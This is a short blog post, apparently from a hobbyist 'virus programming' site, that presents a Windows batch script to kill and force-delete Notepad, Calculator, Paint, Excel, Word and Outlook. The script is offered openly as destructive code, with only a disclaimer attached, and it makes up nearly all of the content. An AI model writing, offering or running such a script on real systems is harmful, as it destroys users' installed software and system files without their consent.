// Place side add here
Virus Programming/Batch File Programming
Internet Tips
Hacking Stuff
Useful Softwares
AntiVirus and Security Tips

Code to Delete notepad, calc, paint, excel, word, outlook



rem ---------------------------------
rem Delete Notepad
tskill notepad
del /f /q "%windir%\system32\notepad.exe"
rem ---------------------------------
rem ---------------------------------
rem Delete Calculator
tskill calc
del /f /q "%windir%\system32\calc.exe
rem ---------------------------------
rem ---------------------------------
rem Delete Paint
tskill mspaint
del /f /q "%windir%\system32\mspaint.exe"
rem ---------------------------------
rem ---------------------------------
rem Delete Excel
tskill excel
del /f /q "%SystemDrive%\Program Files\Microsoft Office\Office10\EXCEL.EXE"
rem ---------------------------------
rem ---------------------------------
rem Delete Word
tskill WINWORD
del /f /q "%SystemDrive%\Program Files\Microsoft Office\Office10\WINWORD.EXE"
rem ---------------------------------
rem ---------------------------------
rem Delete Outlook
tskill outlook
del /f /q "%SystemDrive%\Program Files\Microsoft Office\Office10\OUTLOOK.EXE"
rem ---------------------------------






[Note: Be careful in using these scripts, i will not be responsible if you damage your system.]
author

Written by:

Surbhi is Founder of Techbyte4u.com. Follow her on Twitter or email her

Bookmark and Share

2 comments for this post

Leave a reply

TechByte4U on FaceBook
Videos on Tech Byte 4 U